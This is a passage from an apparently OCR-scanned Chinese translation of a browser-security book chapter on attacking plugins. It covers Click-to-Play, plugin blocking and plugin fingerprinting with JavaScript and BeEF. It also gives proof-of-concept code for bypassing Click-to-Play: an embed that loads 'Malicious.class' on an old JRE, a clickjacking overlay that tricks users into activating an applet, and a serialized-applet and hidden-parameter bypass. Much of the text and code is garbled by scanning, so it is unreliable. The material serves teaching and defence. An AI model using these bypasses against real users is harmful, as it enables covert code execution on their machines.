在 底层 代码 改变 后 ， 加 载 到 浏览 器 中 的 搬 件 可 能 会 变 得 不 稳定 。 


8.1.3 ”调用 插件 


如 前 所 述 ， 插 件 可 以 通过 两 种 途径 调用 : Web 服 务 器 交付 的 Content-type 与 相应 的 MIME 类 型 
匹配 ， 或 者 通过 <embedq> 或 <object> 标 签 。 以 下 是 在 网 页 中 舱 人 和 人 Flash 文件 的 代码 示例 


<object data="flashdemo.swf" type="application/x-shockwave-flash"> 
<param name="bhh" value="true"> 
</object> 


xt 个 示例 代码 告诉 济 览 髓 在 页 面 中 嵌入 一 个 对 象 。 在 文件 加 载 后 ， 通 过 MIME 确 定 的 内 容 类 
型 为 Flash 对 象 。 这 就 告诉 浏览 器 应 该 使 用 Flash 搬 件 加 载 这 个 对 象 。 最 后 ， 它 还 向 Flash 搬 件 中 传 
人 了 bhh 参 数 。 


























8.1 理解 插件 291 





点 击 播放 

Click to Play ( 点 击 播放 ) 是 一 个 保障 用 户 安全 的 措施 ， 即 在 运行 插件 之 前 请 求 用 户 授权 :。 
比如 ，Mozilla 就 实现 了 这 个 机 制 , 在 因为 不 同 需求 安装 了 多 个 版 本 的 应 用 时 , 它 会 通过 这 个 机 佣 
来 阻止 网 站 调用 老 版 本 的 插件 。 

有 了 点 击 播放 机 制 ， 那些 需 要 调用 老 版 本 Flash、Acrobat Reader 或 Java 的 攻击 就 会 受到 影响 ， 
因为 用 户 必须 点 击 屏 幕 上 某 个 区 域 ， 才 能 激活 插件 ， 运 行 代 码 。 除 了 限制 老 版 本 插件 的 执行 外 ， 
这 种 机 制 也 减 小 了 用 户 无 意识 地 执行 插件 的 可 能 性 。 谷 歌 Chrome 包括 类 似 的 特性 ， 但 它 不 是 默 
认 启 用 的 。 


在 Firefox 中 指定 特定 的 Java 运 行 时 


如 果 你 确定 匀 连 的 Firefox 浏 览 器 有 权 访 问 菜 个 老 版 本 的 JRE (Java Runtime Environment, 
Java 运 行 时 环境 )， 那 么 可 以 在 <embed> 标 签 里 修改 type 必 性， 并 使 用 老 版 本 的 JRE 运 行 小 程 
序 。 比 如 ， 下 面 这 段 代码 : 


<embed code="Malicious.class" 

width="1" height="1" 
type="application/x-java-applet;version=1.6.0" 
pluginspage="http"://java.sun.com/j2se/1.6.0/download.html />" 























= 
































在 这 里 ，Malicious.class 小 程序 会 尝试 用 支持 MIME 类 型 application/x-java-applet; 
version=1.6 的 J 有 RE 来 运行 。 如 果 系 统 中 安装 了 一 个 版 本 大 于 或 等 于 该 指定 版 本 的 J 恨 E， 就 会 
以 这 个 JRE 米 运行 这 个 小 程序 。 否 则 ， 就 会 把 用 户 转 到 pluginspage 属 性 指定 的 URL。 

另外 ， 再 看 一 下 这 个 例子 : 


<embed code="Malicious.class" 

width="1" height="1" 
type-"application/x-java-applet;jpi-version-1.6.0 18" 
pluginspage-"http://java.sun.com/j2se/1.6.0/download.html" /> 


这 时 候 ，Malicious.class 小 程序 会 尝试 在 了 RE 1.6.0 18 中 运行 。 如 果 没 有 对 应 版 本 的 JRE， 
那么 用 户 就 会 被 重 定向 到 pluginspage 属 性 指定 的 URL。 

如 果 你 的 目标 是 某 个 受 特定 攻击 或 点 击 播放 漏洞 影响 的 Java 版 本 ， 那 这 些 方法 可 能 会 帮 到 
你 ， 有 具体 情形 将 在 8.3.2 节 再 详细 介绍 。 














点 击 播放 本 身 内 置 有 一 个 屏蔽 列表 , 在 Mozilla 知 道 会 导致 安全 问题 的 时 候 , 会 自动 启用 插件 
的 这 个 特性 *。 不 ae 点 击 播放 也 存在 一 些 安全 漏洞 ， 受 到 各 种 绕 行 方案 的 挑战 。 不 要 害怕 ， 稍 
后 我 们 会 详细 介 这 些 漏洞 和 方案 。 

在 激活 点 E RENS 浏览 需 会 在 用 户 明 确 得 到 提示 ， 并 点 击 Accept ( 接受 ) 之 后 
才 会 运行 插件 。 图 8-3 展 示 了 三 种 不 同 的 插件 : 需要 提示 用 户 来 激活 的 Java 插 件 ， 会 上 自动 播 放 的 
QuickTime 插 件 ， 以 及 除非 用 户 重新 启用 ， 否 则 永远 不 会 激活 的 旧版 本 的 Acrobat 插 件 。 
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Displays Java applet content, or a placeholder if Java is not installed. More Ask to Activate = 
QuickTime Plug-in 7.7.1 7.7.1 


The QuickTime Plugin allows you to view a wide variety of multimedia content in web p... More 








SharePoint Browser Plug-in 14.2.5 
Microsoft Office for Mac SharePoint Browser Plug-in More 


Shockwave Flash 11.8.800.168 


Shockwave Flash 11.8 r800 





jore 





4 aaa8 











点 Adobe Acrobat NPAPI Plug-in, Version 10.1.3 is known to cause sect tal a re 
Adobe Acrobat NPAPI Plug-in, Version 10.1.3 10.1.3 (disabled) 
Adobe® Acrobat® Plug-in for Web Browsers, Version 10.1.3 Mi 




















图 8-3 ”Firefox 的 插件 选项 显示 了 三 种 不 同 的 插件 状态 








8.1.4 插件 是 怎么 被 屏蔽 的 


在 探讨 插件 是 怎么 被 屏蔽 的 之 前 ， 首先 我 们 得 理解 为 什么 插件 会 被 屏蔽 。 没 错 ,安全 是 最 明 
显 的 理由 。 不 过 ,屏蔽 插件 还 有 其 他 原因 ， 比 如 某 些 插件 由 于 支持 流 媒 体 而 违反 公司 制度 、 涉 及 
隐私 ， 或 者 可 能 影响 员工 工作 效率 。 

可 以 通过 在 公司 管理 的 计算 机 上 应 用 配置 来 屏蔽 插件 , 或 者 由 提供 商 自 己 屏蔽 。 比 如 ,微软 
为 了 阻止 黑客 利用 ， 曾 以 安全 补丁 的 形式 发 布 过 针对 某 些 有 漏洞 的 ActiveX 搬 件 的 kill bit Kill 
bits 就 是 注册 表 中 的 配置 项 ， 可 以 将 COM 或 ActiveX 对 象 标 记 为 不 能 在 浏览 器 中 加 载 。Mozilla 也 
对 用 户 屏蔽 了 老 版 本 的 Java， 以 减少 被 攻击 的 可 能 。 很 多 公司 也 部 署 了 自己 的 ActiveX kill bits, 
用 于 禁用 那些 可 能 被 第 三 方 利用 的 插件 。Adobe 产 品 就 是 一 个 例子 ， 在 公司 环境 中 要 想 给 它们 打 
补丁 可 不 容易 。 

苹果 在 2013 年 初 加 入 了 屏蔽 插件 的 公司 行列 ， 当 时 它 屏 蔽 了 Java 7， 以 保护 用 户 不 会 因 漏 洞 
版 本 而 受到 威胁 *。 为 此 ， 苹 果 修 改 了 其 防 恶意 软件 Xprotect 的 配置 文件 ， 以 屏蔽 Java 插 件 。 要 想 
知道 你 的 Mac 屏 项 了 什么 ， 可 以 查看 plist 这 个 XML 文 件 ， 路 径 是 /System/Library/CoreServices/ 
CoreTypes.bundle/Contents/Resources/Xprotect.plist。 

同样 ， 针 对 ActiveX 的 kill bits 也 面世 了 ， 用 于 防止 有 漏洞 的 软件 在 Windows 中 运行 "。 通 过 在 
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility 中 设置 正确 
的 kill bit 值 ， 可 以 强制 不 在 正中 加 载 特定 版 本 的 ActiveX， 而 不 屏蔽 所 有 版 本 。 

Firefox 没 有 提供 这 些 企 业 级 的 方案 。 不 过 , 它 内 置 的 黑 名 单 也 可 以 屏蔽 已 知 的 恶意 插件 。 Java 
插件 也 在 Firefox 的 黑 名 单 中 ,这 个 名 单 是 自动 更 新 的 。 但 这 种 方式 可 能 会 给 企业 用 户 造 成 一 些 问 
题 ， 因 为 用 户 可 以 重新 启用 被 屏蔽 的 插件 。 


8.2 采集 插件 指纹 

与 攻击 浏览 器 扩展 类 似 , 如 果 你 提前 知道 了 自己 要 对 付 的 是 什么 , 那么 攻击 插件 也 会 容易 很 
多 。 采集 插件 指纹 非常 类 似 于 采集 浏览 器 指纹 , 就 是 向 浏览 器 发 送 请 求 , 确定 运行 的 到 底 是 什么 。 
本 节 介 绍 检测 和 采集 浏览 器 插件 指纹 的 不 同方 法 。 
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8.2.1 检测 插件 


检测 插件 很 容易 ， 有 手工 和 自动 两 种 方式 。 某 些 插件 稍微 会 麻烦 一 点 ,麻烦 的 地 方 包括 提交 
简单 的 DOM 请 求 ， 以 加 载 特定 类 型 的 文件 。 通 过 综合 使 用 相关 技术 ， 应 该 可 以 检测 出 大 多 数 浏 
览 器 插件 ， 不 仅 可 以 知道 它们 是 否 处 于 活动 状态 ， 还 可 以 确定 版 本 。 
本 小 节 首先 介绍 如 何 手 工 查询 浏览 器 插件 。 然 后 , 在 接 下 来 儿 小 节 , 我 们 再 介绍 如 何 利 用 框 
架 和 插件 自动 检测 插件 的 版 本 ， 为 攻击 做 准备 。 

Firefox 和 Chrome 会 把 安装 的 插件 放 在 一 个 DOM 对 象 navigator.plugins 中 ， 因 此 手工 查 
询 起 来 非常 方便 。 为 此 ， 只 要 简单 创建 一 个 网 页 ， 结 合 Mozilla 参 考 信息 输出 一 个 表格 即 可 : 


<HTML> 

<BODY> 

<SCRIPT> 

var pluginLen = navigator.plugins.length; 

document .write("<TABLE><TR><TH COLSPAN=4>") ; 

document .write ( 
"Plugins Found: " + pluginLen.toString() + " «/TH»«/TR»" + 
"<TR><TH>Name</TH><TH>Filename</TH>" + 
"<TH>Description</TH><TH>Version</TH></TR>\n" 









































ye 


for(var i = 0; i < pluginLen; i++) ( 
document .write ( 
"<TR><TD>"+ 
navigator.plugins[i].name + 
"</TD><TD>"_ + 
navigator.plugins[i].filename + 
"</TD><TD>"_ + 
navigator.plugins[i].description + 
"</TD><TD>"_ + 
navigator.plugins[i].version + 
"</TD></TR>\n" 
s 
} 
document.write ("</TABLE>"); 
</SCRIPT> 
</BODY> 
</HTML> 


巴 前 面 代码 保存 为 HTML 文 件 , 然后 加 载 到 浏览 器 ， 就 会 输出 一 个 如 图 8-4 所 示 的 表格 , 列 出 
每 种 插件 的 名 称 和 版 本 。 可 以 从 中 看 出 哪些 插件 是 激活 的 ， 能 直接 调用 ,哪些 插件 需要 “点 击 播 
放 ”， 另 外 有 些 插件 可 能 需要 进一步 加 以 确认 。 

在 图 8-4 中 ， 可 以 看 到 运行 前 面 代码 之 后 的 结果 ， 其 实 就 是 简单 地 枚 举 了 navigator. 
plugins 这 个 DOM 对 象 。 

在 Firefox 和 Chrome 中 ， 可 以 进一步 检测 navigator .mimeTypes 这 个 DOM 对 象 。 通 过 查询 
这 个 对 象 返回 的 数组 ， 可 以 知道 相应 的 插件 是 否 返 回 MimeType 对 象 ， 或 者 返回 undefined。 
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file:// /tmp/tt.html 


Name 
Shockwave Flash 
Google Talk Plugin 
Google Talk Plugin 


Filename 
Flash Player.plugin 
googletalkbrowserplugin.plugin 
oldbrowserplugin plugin 


Plugins Found: 13 


Shockwave Flash 11.8 r800 
Version 4.5.2.14837 


Version 4.5.2.14837 


Description 


Version 
11.8.800.168 
4.5.2.14837 


4.5.2.14837 


Video Renderer 
Google Talk Plugin 


Video Accelerator 0.1.44.29 


npgtpo3dautoplugin.plugin Google Talk Plugin Video Accelerator version:0.1.44.29 


Java 7 Update 


Java Applet Plug-in JavaAppletPlugin.plugin Displays Java applet content, or a placeholder if Java is not installed. 21 


The QuickTime Plugin allows you to view a wide variety of 
multimedia content in web pages. For more information, visit the 734 
QuickTime Web site. 


SharePointBrowserPlugin.plugin Microsoft Office for Mac SharePoint Browser Plug-in 14.2.5 


QuickTime Plug-in 7.7.1 QuickTime Plugin.plugin 


SharePoint Browser 
Plug-in 


LA Vie ing Facebook VideoCalling.webplugin Facebook Video Calling by Skype 
20-20 3D Viewer for 
Web v5.0.7.0 


120.157 


NP. 2020Player WEB.plugin 20-20 Technologies - 20-20 3D Viewer for Web v5.0.7.0 5.0.7.0 


DirectorShockwave.plugin 11.5.7r609 
fbplugin_1_0_1.plugin 10 

n ;.  TheFlipsMac WMV Plugin allows you to view Windows Media 
FlipáMac WMV Plugin.plugin content using QuickTime. 22.049 
iPhotoPhotocast.plugin iPhoto6 70 


Flip4Mac Windows 
Media Plugin 2.2 
iPhotoPhotocast 





图 8-4” 枚 举 DOM 对 象 navigator.plugins 


通过 使 用 ! ,技巧 (6.1.2 节 介绍 过 )， 很 容易 根据 MIME 类 型 检测 出 浏览 器 是 否 安装 了 Flash: 


>>> !!navigator.mimeTypes["application/x-shockwave-flash"] 
true 


在 了 正中， 多 数 插件 都 在 ActiveX 控 件 中 执行 。 检 测 系统 中 是 和 否 安装 了 某 插件 的 最 简单 方式 ， 
就 是 尝试 实例 化 一 个 ActiveX 对 象 ， 并 检测 实例 化 之 后 返回 的 是 不 是 一 个 有 效 的 对 象 。 比 如 ， 要 
检测 正中 是 否 启用 了 Flash， 可 以 执行 以 下 JavaScript 代 码 : 


flash_versions = 11; 
flash_installed = false; 
objname = "ShockwaveFlash.ShockwaveFlash."; 
if (window.ActiveXObject) { 
for (x = 2; x <= flash versions; x++) { 
try { 
Flash = eval("new ActiveXObject('" + objname + x + "');"); 
if (Flash) ( 
flash, installed - true; 











} 
} catch (e) { } 


j 

代码 最 后 , 如 果 flash_installed 变 量 值 为 true, 则 说 明 安 装 了 Flash, 而 如 果 值 为 false， 
则 说 明 没 安装 。 这 里 会 检测 10 个 不 同 版 本 的 Flash， 从 版 本 2 到 版 本 11。 每 个 针对 Flash 的 ActiveX 
对 象 ， 对 应 每 个 版 本 都 会 返回 不 同 的 名 称 。 这 样 通过 迭代 这 些 名 称 ， 以 及 当时 创建 的 ActiveX 对 
象 ， 就 能 知道 安装 了 哪个 版 本 的 Flash。 这 确实 比 检测 Firefox 和 Chrome 中 的 插件 要 麻烦 一 些 , 但 
在 不 通过 DOM 访 问 插件 的 情况 下 ， 这 是 在 正中 识别 插件 的 最 有 效 方式 。 
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822 ”自动 检测 插件 


知道 了 怎么 使 用 JavaScript 手 工 检测 插件 , 接 下 来 可 以 看 一 看 怎么 自动 检测 插件 。 知道 如 何 检 
测 插 件 有 助 于 扩展 相应 的 自动 化 框架 。 不 少 人 都 用 过 的 一 个 插件 检测 框架 ， 就 是 Eric Gerds 写 的 
PluginDetect”。 使 用 一 个 封装 起 来 的 JavaScript 类 ， 加 上 一 些 子 模块 ， 可 以 构建 轻 量 级 的 JavaScript 
查询 模块 ， 用 于 检测 不 同类 型 的 插件 。 

这 些 框架 类 型 可 以 帮 我 们 快速 定位 那些 可 能 被 攻击 的 目标 插件 。 很 多 时 候 , 用 户 可 能 根本 不 
知道 有 谁 检测 过 自己 浏览 锅 中 安装 了 哪些 插件 。 不 过 ， 有 些 浏览 器 ， 比 如 IE 从 IE8 开 始 ， 就 会 通 
过 弹出 对 话 框 来 提示 用 户 。 因 此 ， 在 实际 攻击 中 ， 最 好 还 是 通过 检测 ActiveX 来 对 浏览 絮 版 本 加 
以 测试 。 

虽然 对 检测 插件 来 说 ，PluginDetect 是 不 错 的 工具 ， 但 如 果 你 只 想 看 看 自己 的 浏览 器 里 安装 
了 哪些 插件 ,以 及 这 些 插件 是 否 都 及 时 更 新 了 ,可 以 用 浏览 器 打开 Mozilla 的 一 个 插件 检测 网 站 ”。 
这 个 站 点 不 仅 会 列 出 浏览 器 中 已 安装 的 插件 , 还 会 检测 插件 的 更 新 状态 。 图 8-5 展 示 了 打开 Mozilla 
这 个 网 站 之 后 看 到 的 输出 。 从 中 可 以 看 到 ， 有 些 插件 需要 更 新 了 ， 而 有 些 插件 的 状态 未 知 。 





























Plugin Status 


* Step 1: Click Update to update a plugin. 
* Step 2: Complete all recommended updates before restarting your browser. 


Potentially vulnerable plugins 
Plugin Status Action 


«. Java Applet Plug-in 
E> Dispiays ava apolet content or a placehoider t javaisrot Vulnerable GO pote now 
= instaled 


Outdated Plugins 


Plugin Status Action 


Sx Flip4Mac Windows Media Plugin 2.2 
图 reripsnvac vi ugn alonsyoutevew Windows Vulnerable QO vpaate now 
Media content 


using QuickTime 





Unknown Plugins 
Plugin Status Action 


a octet i 
图 8-5 ” ”Mozilla 插件 状态 页 面 展示 了 需要 更 新 的 插件 

















这 个 插件 状态 页 面 检 测 了 很 多 常用 插件 ， 不 过 从 图 8-5 中 也 可 以 看 到 ， 有 些 持 件 是 这 个 页 面 
不 知道 的 。 这 个 站 点 告诉 我 们 怎么 取得 插件 的 版 本 。 


8.23 用 BeEF 检测 插件 


前 面 讨 论 的 方法 可 以 帮 你 检测 插件 , 或 者 编写 插件 检测 框架 , 但 有 时 候 使 用 现成 的 工具 还 是 
最 方便 。BeEF 内 置 了 插件 检测 工具 ， 除 非 需要 检测 BeEF 不 知道 的 最 新 插件 ， 否 则 不 需要 对 它 进 
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行 扩展 就 可 以 直接 拿 来 用 。 

通过 BeEF 勾 连 浏 览 器 之 后 ， 它 可 以 自动 帮 你 检测 插件 。 图 8-6 展 示 了 BeEF 在 勾 连 浏览 絮 后 ， 
通过 指纹 采集 默认 为 你 检测 到 的 插件 信息 。 可 以 在 初始 化 的 时 候 , 看 到 对 Flash、VLC 及 更 多 插件 
的 检测 信息 。 





日 Category: Browser (6 Items) 
Browser Name: Firefox Initialization 
Browser Version: 24 Initialization 


Browser UA String: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:24.0) Initialization 
Gecko/20100101 Firefox/24.0 


Browser Platform: Macintel Initialization 


Browser Plugins: Shockwave Flash-v.11.9.900.117, QuickTime Plug-in 7.7.1- Initialization 
v.7.7.1,Java Applet Plug-in-v.Java 7 Update 40,Google Talk Plugin Video Renderer- 
v.4.4.2.14502,Google Talk Plugin-v.4.4.2.14502,Google Talk Plugin Video Accelerator- 
v.0.1.44.29,Google Earth Plug-in-v.7.1, WebEx64 General Plugin Container- 


v.1.0,Silverlight Plug-In-v.5.1.20125.0, SharePoint Browser Plug-in-v.14.2.4,Lync Meeting 
Join Plug-in-v.4.0.7577.5 


Window Size: Width: 1185, Height: 743 Initialization 
日 Category: Browser Components (14 Items) 

Flash: Yes Initialization 
VBScript: No Initialization 
PhoneGap: No Initialization 
Google Gears: No Initialization 
Silverlight: Yes Initialization 
Web Sockets: Yes Initialization 
QuickTime: Yes Initialization 
RealPlayer: No Initialization 
Windows Media Player: No Initialization 
Foxit Reader: No Initialization 
WebRTC: Yes Initialization 
ActiveX: No Initialization 


图 8-6 ”查看 匀 连 浏览 器 的 插件 列表 


为 了 把 检测 自动 化 ，BeEF 尝 试 在 不 惊动 用 户 的 情况 下 ， 进 行 额外 的 插件 指纹 采集 工作 。 对 
于 其 他 需要 在 BeEF 中 手工 检测 的 捅 件 来 说 ， 可 能 需要 通知 用 户 。 图 8-7 展 示 了 相应 的 命令 ， 通 过 
对 浏览 器 运行 这 些 命令 可 以 检测 其 他 插件 。 

BeEF 使 用 4 种 颜色 表示 插件 的 警示 状态 。 — 
绿色 插件 表示 不 会 提示 用 户 你 在 检测 它们 。 灰 2 Browser (47) 
Cui o RA BCR MLB) FEE EAE ee 
表示 在 某 些 条 件 下 可 能 会 提示 用 户 ， 比 如 在 插 Delect Treena 


Detect Foxit Reader 


件 存在 的 情况 下 可 能 不 会 提示 用 户 ， 但 在 插件 Detect LastPass 

不 存在 时 可 能 会 提示 ( 有 时 候 也 可 能 是 相反 的 Detect RealPlayer 

情况 下 会 提示 用 户 ), 红 色 插 件 表示 可 能 会 把 你 ee 

的 活动 报告 给 用 户 。 根 据 这 些 颜色 ， 你 可 以 先 amp 
择 相应 的 模块 并 针对 某 个 浏览 器 启动 ， 然 后 进 ee 


一 步 确定 要 执行 的 其 他 有 漏洞 的 模块 。 图 8-7 在 BeEF 中 检测 其 他 插件 
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8.3 攻击 插件 


检测 插件 可 以 让 我 们 找到 能 够 实施 攻击 的 插件 ,而 利用 这 些 插件 干 些 什么 才 是 真正 的 乐趣 所 
TE. 插件 是 黑客 的 常见 攻击 目标 , 正 因为 如 此 ， 作 为 一 位 安全 工作 者 , 才 更 应 该 深入 了 解 攻击 插 
件 的 过 程 。 这 样 你 才能 向 企业 的 安全 团队 或 合作 者 们 展示 插件 的 漏洞 ， 以 说 服 他 们 修复 漏洞 或 者 
修改 安全 策略 。 

本 节 讲 述 攻 击 插件 的 几 种 不 同方 法 ， 涉 及 如 何 绕 过 点 击 播放 插件 机 制 ， 还 有 哪些 持 件 是 最 
常见 的 攻击 目标 。 然 后 你 就 会 明日 怎么 利用 插件 中 的 漏洞 ， 来 控制 浏览 右 或 者 在 远程 机 絮 上 执 
行 代码 。 


8.3.1 绕 过 点 击 播放 


虽然 现代 浏览 器 会 使 用 点 击 播放 机 制 , 以 针对 潜在 的 可 疑 活 动向 用 户 报警 , 但 某 些小 型 或 隐 
藏 插件 的 实例 ， 可 能 不 会 请 求 用 户 许可 也 能 执行 。 

这 些 行 为 及 默认 配置 中 的 复杂 性 ,给 浏览 器 开发 者 造成 了 困扰 。 同样, 也 给 那些 承担 安全 防 
御 工 作 的 人 制造 了 麻烦 。 他 们 怎么 知道 某 个 插件 是 不 是 需要 用 户 确 认 执 行 点 击 播放 呢 ? 有 时候 ， 
插件 需要 在 显示 的 网 页 中 执行 ， 而 无 需 对 用 户 可 见 。 比 如 ,为 了 研究 可 用 性 ， 可 在 浏览 絮 中 跟踪 
导航 的 插件 , 可 能 因为 设计 者 的 决定 而 在 页 面 中 保持 不 可 见 。 如 果 用 户 随后 被 要 求 对 不 可 见 的 插 
件 点 击 播 放 ， 那 么 他 们 应 该 点 击 哪里 呢 ? 

1. Firefox 的 例子 

过 去 ， 点 击 播放 机 制 曾 出 现 过 允许 搬 件 自动 显示 的 bug。Ben Murphy 提 出 了 一 个 有 趣 的 绕 行 
方案 ， 在 2013 年 3 月 仍然 可 以 成 功 在 Firefox 中 实现 ”。 其 概念 验证 代码 简单 有 效 : 


<html> 
<head> 
<style type='text/css'> 
#overlay { 
background-color: black; 
position: absolute; 
top: Opx; 
left: Opx; 
width: 550px; 
height: 450px; 
color: white; 
text-align: center; 
padding-top: 100px; 
pointer-events: none; 
j 
</style> 
<body> 
<div id="overlay">Click here</div> 
<applet code="Foo.class" width="500" height="500"/> 
</body> 
</html> 
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298 第 8 章 攻击 插件 





指定 pointer-events: none 可 以 阻止 在 黑色 #overlay div 上 触发 任何 鼠标 事 


int 





件 。 然 后 


就 可 以 想 办 法 欺骗 用 户 点 击 Click here， 从 而 导致 Java 小 程序 执行 ， 如 图 8-8 所 示 。 


bugzilla.mozilla.org/attachment.cgi?id- 71121 


Click here 


security: Loaded SSL Root CA certificates from C:YPr 


rogram Files (x86)\Java\jre6\ib\s ^ 


security: Loading certificates from Deployment session certificate store 

security: Loaded certificates from Deployment session certificate store 

security: Checking if certificate is in Deployment denied certificate store 

network: Connecting https: //bug838999. bugzilla.mozilla.org/Foo.dass with cookie ”_ 
network: Cache entry not found [url: https://bug838999. bugzilla. mozilla.org/Foo/cdas 
network: Connecting https: //bug838999. bugzilla.mozilla.org/Foo/dass.dass with prox 


network: Connecting https: //bug838999. bugzilla.mozilla.org/Foo/class.dlass with cook 


basic: load: dass Foo.dass not found. 
load: class Foo.dass not found. 
java.lang.ClassNotFoundException: Foo.dass 


at sun.plugin2.applet.Applet2ClassLoader. findClass(Unknown Source) 
at sun.plugin2.applet.Plugin2ClassLoader.loadClass0 (Unknown Source) 
at sun.plugin2.applet.Plugin2ClassLoader .loadClass(Unknown Source) 
at sun.plugin2.applet.Plugin2ClassLoader.loadClass(Unknown Source) 
at java.lang.ClassLoader.loadClass(Unknown Source) 

at sun.plugin2.applet.Plugin2ClassLoader.loadCode (Unknown Source) 


at sun.plugin2.applet.Plugin2Manager. 


createApplet(Unknown Source) |= 


at sun.plugin2.applet.Plugin2Manager SAppletExecutionRunnable.run(Ur| 
at java.lang.Thread.run(Unknown Source) 


Exception: java.lang.ClassNotFoundException: Foo. 


4 m 


dass 





B | | = | 


m 











图 8-8” 绕 过 点 击 播放 执行 一 个 未 签名 的 Java 小 程序 


通过 动态 修改 #ovetrlay div 的 CSS 规 则 ， 同 时 添加 opaque: 0.4， 可 以 看 到 这 个 覆盖 层 后 
面 是 什么 ， 如 图 8-9 所 示 。 使 用 这 个 技术 ， 加 上 某 种 程度 的 社会 工程 学 ， 用 户 最 终 就 会 在 点 击 播 








放 对 话 框 中 点 击 Accept。 

这 种 攻击 属于 一 种 典型 的 点 击 劫持 攻击 ， 章 介绍 过 
显示 在 点 击 播放 对 话 框 之 上 。 

Firefox 会 提示 用 户 , 说 插件 需要 升级 了 ， 而 且 会 在 地 




















过 。 这 种 攻击 的 重点 在 于 把 覆盖 层 div 


址 栏 左 侧 显 示 红 色 的 插件 图 标 。 用 户 可 





能 不 会 太 注 意 就 点 了 黑色 的 div。 在 图 8-8 和 图 8-9 中 都 可 以 看 到 红色 的 警告 图 标 。 





但 是 ， 如 打开 发 彰 发 现 了 这 种 漏洞， 可 能 很 快 就 把 它 





























们 堵 上 。 换 名 话说 ， 这 种 漏洞 是 可 遇 而 








不 可 求 的 。 精确 的 浏览 絮 指 纹 采集 有 助 于 确定 目标 浏览 
辑 ， 确 定 哪 种 展示 插件 的 方式 最 有 助 于 激活 插件 。 








是 否 存在 漏洞 。 可 以 通过 创建 相应 的 逻 
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< @ https://b ugzilla.mozilla.org/attachment.cgi?id=711217 


eR < SMI "| Console HTML | CSS | Script DOM Net Cookies 





Source Edit -| attachment.cgi?id=711217 ~ 


foverlay { 
background-color: black; 
color: white; 
height: 450px; 
left: 0; 
padding-top: 100px; 
pointer-events: none; 
position: absolute; 
text-align: center; 
top: 0; 
width: 550px; 


lopacity- 0.4; 











图 8-9 ”添加 不 透明 度 以 显示 覆盖 层 之 下 有 什么 


2. Java 的 例子 
从 Java 1.7u11 开 始 ，Oracle 修 改 了 其 点 击 播放 实现 ， 针 对 包含 未 签名 的 小 程序 在 内 的 所 有 小 
程序 ， 都 会 提示 用 户 ， 经 用 户 确认 后 运行 。 这 一 改进 极 大 降低 了 使 用 Java 利 用 及 SOP 绕 行 攻击 的 
成 功率 。 
毫 不 奇怪 ， 点 击 播放 的 实现 中 曾经 存在 几 个 bug， 利 用 它们 可 以 在 不 经 用 户 参 与 的 情况 下 执 
行 Java 小 程序 。 第 一 个 线 行 方案 "来 自 Esteban Guillardoy, TEJava 1.7u13 中 被 修复 ,该 方案 通过 
个 “不 怎么 为 人 所 知 的 ”小 程序 属性 object ， 加 载 序列 化 的 小 程序 ”。 i 
如 果 看 一 看 Java Plugin2Manager 类 的 源码 ， 就 会 看 到 点 击 播放 的 逻辑 。 特 别 地 ， 看 一 看 
initAppletAdapter() 方 法 。 可 以 看 到 ， 如 果 使 用 代码 属性 初始 化 小 程序 ， 那 么 会 调用 fire- 
AppletSSsvValidation() 方 法 : 
































void initAppletAdapter (AppletExecutionRunnable 
paramAppletExecutionRunnable) 
throws ClassNotFoundException, IllegalAccessException, 
ExitException, JRESelectException, IOException, 
InstantiationException { 
long 1 = DeployPerfUtil.put ( 
OL, "Plugin2Manager.createApplet() - BEGIN"); 
/* 
* 取得 "code" 和 "object" 小 程序 属性 的 值 
a) 
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String strl = getSerializedObject(); 
String str2 = getCode(); 


beresi pere] 


at ((str2 t= null) && (stri t= nüll)j { 
System.err.println(amh.getMessage("runloader.err")); 
throw new InstantiationException( 

"Either \"code\" or \"object\"" + 

" should be specified, but not both."); 
} 


if ((str2 == null) && (strl == null)) 
return; 
if (str2 != null) { 

/* 


* 通过 "code" 属 性 正常 加 载 小 程序 

* 触发 Ctp pop=up， 等 待 用 户 介 入 

*/ 

if (fireAppletSSVValidation()) { 

appletSSVRelaunch(); 

} 

| © ey | 
} else { 
if (Ithis.isSecureVM) 

return; 
// 通过 "object" 属 性 加 载 serialized 小 程序 
this.adapter.instantiateSerialApplet(localPlugin2ClassLoader, str1); 
this.doInit = false; 


DeployPerfUtil 
.put("Plugin2Manager.createApplet()" + 
" - post: secureVM .. serialized .. "); 
} 
hiest pana] 
DeployPerfUtil.put(l, "Plugin2Manager.initAppletAdapter() - END"); 


} 

此 时 ， 如 果 没 有 使 用 code 属 性 ，Java 假 设 你 会 使 用 object 届 
程序 。 这 时 候 ， 不 会 触发 点 击 播放 机 制 。 

为 了 利用 这 个 缺陷 ， 可 以 使 用 以 下 代码 由 入 小 程序 : 


<embed object="object.ser" 
type="application/x-java-applet;version=1.6"> 


另 一 个 绕 行 方案 2 同样 来 自 Estenban， 是 在 Java 1.7u21 中 被 修复 的 。 这 个 方案 依赖 于 在 通过 
JNLP ( Java Network Launching Protocol, Java 网 络 启动 协议 ) 描述 符 调 用 小 程序 时 传人 的 一 个 
隐藏 参数 "“。 使 用 JNLP 是 启动 小 程序 的 简便 方法 ， 也 可 以 通过 它 要 求 小 程序 在 特定 版 本 的 Java 
上 运行 。 

分 析 一 下 PluginMain 这 个 Java 类 的 源 代码 , 特别 是 performssvvalidation() 方 法 , 可 以 
看 到 下 面 儿 行 : 














生 ， 也 就 是 加 载 序列 化 后 的 小 
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public static boolean performSSVValidation 
(Plugin2Manager paramPlugin2Manager) 
throws ExitException { 


boolean bool = Boolean.valueOf (paramPlugin2Manager. 
getParameter("__applet_ssv_validated")). 
booleanValue(); 
if (bool) 
return false; 
LaunchDesc localLaunchDesc = null; 
AppInfo localAppInfo - null; 


Eras Snipes] 


} 

注意 其 中 未 加 说 明 的 _ applet_ssv_validate 参 数 ， 如 果 它 的 值 为 Lrue， 就 会 跳 过 检测 
并 退出 当前 方法 。 不 过 如 果 不 通过 常规 的 小 程序 调用 ， 就 不 能 使 用 这 个 参数 。 因 为 以 _ 开 头 的 参 
数 名 称 会 被 排除 在 外 。 好 在 ， 通 过 JNLP 描 述 符 初始 化 小 程序 时 ， 也 会 调用 performssvV- 
aliaqation() 的 实现 ， 而 且 不 会 限制 参数 的 名 称 。 

换 名 话说 ， 只 要 通过 使 用 那个 隐藏 参数 的 JNLP 描 述 符 启 用 小 程序 ， 就 可 以 绕 过 点 击 播放 限 
制 。 漂 亮 ! 


下 面 就 是 一 个 JNLP 措 述 符 的 例子 ， 你 可 以 参考 : 


<?xml version="1.0" encoding="utf-8"?> 
